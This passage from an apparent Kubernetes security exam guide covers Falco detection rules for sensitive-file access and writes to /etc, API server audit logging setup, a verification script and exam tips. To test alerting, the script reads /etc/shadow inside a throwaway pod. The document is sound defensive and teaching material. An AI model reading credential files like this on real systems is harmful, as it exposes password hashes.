container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: WARNING
tags: [sensitive_files, filesystem, container]
# Rule 4: Write to /etc in containers
- rule: Write Below Etc in Container
desc: Detects write operations to /etc directory in containers
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_write=true and
container.id != host and
fd.name startswith /etc
output: >
File write to /etc in container
(file=%fd.name process=%proc.name user=%user.name
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: ERROR
tags: [filesystem, etc_modification, container]Part 3: Configure API server
Edit /etc/kubernetes/manifests/kube-apiserver.yaml:
sudo vi /etc/kubernetes/manifests/kube-apiserver.yamlAdd flags:
- --audit-policy-file=/etc/kubernetes/audit/comprehensive-policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/comprehensive.log
- --audit-log-maxage=30
- --audit-log-maxbackup=10
- --audit-log-maxsize=100Add volume mounts:
- name: audit-policy
mountPath: /etc/kubernetes/audit/comprehensive-policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/auditAdd volumes:
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/comprehensive-policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreatePart 4: Restart Falco and verify
# Restart Falco
sudo systemctl restart falco
# Wait for API server to restart
sleep 30
kubectl get nodes
# Verify audit logging
ls -la /var/log/kubernetes/audit/comprehensive.log
tail -5 /var/log/kubernetes/audit/comprehensive.log | jq .verb
# Verify Falco
sudo systemctl status falco
sudo journalctl -u falco --since "2 minutes ago" | head -20
# Test by creating a pod and exec-ing
kubectl run test-comprehensive --image=nginx
kubectl wait --for=condition=ready pod/test-comprehensive
kubectl exec test-comprehensive -- bash -c "cat /etc/shadow"
# Verify audit log has the exec event
cat /var/log/kubernetes/audit/comprehensive.log | jq 'select(.objectRef.subresource=="exec")' | tail -5
# Verify Falco captured the shell and shadow file read
sudo journalctl -u falco --since "2 minutes ago" | grep -E "Shell|Sensitive"
# Clean up
kubectl delete pod test-comprehensive
echo "Comprehensive security monitoring setup complete and verified"Final Exam Tips
- Practice the end-to-end workflow: audit policy creation, API server configuration, Falco rule writing, and verification
- Memorize the API server audit flags and volume mount structure
- Know Falco rule syntax -- condition, output, priority, tags
- Always verify after making changes -- check that the API server comes back, Falco restarts, and alerts are generated
- Time management: audit logging configuration is configuration-heavy. Have a template memorized to save time
- jq is your friend: practice common jq patterns for filtering audit logs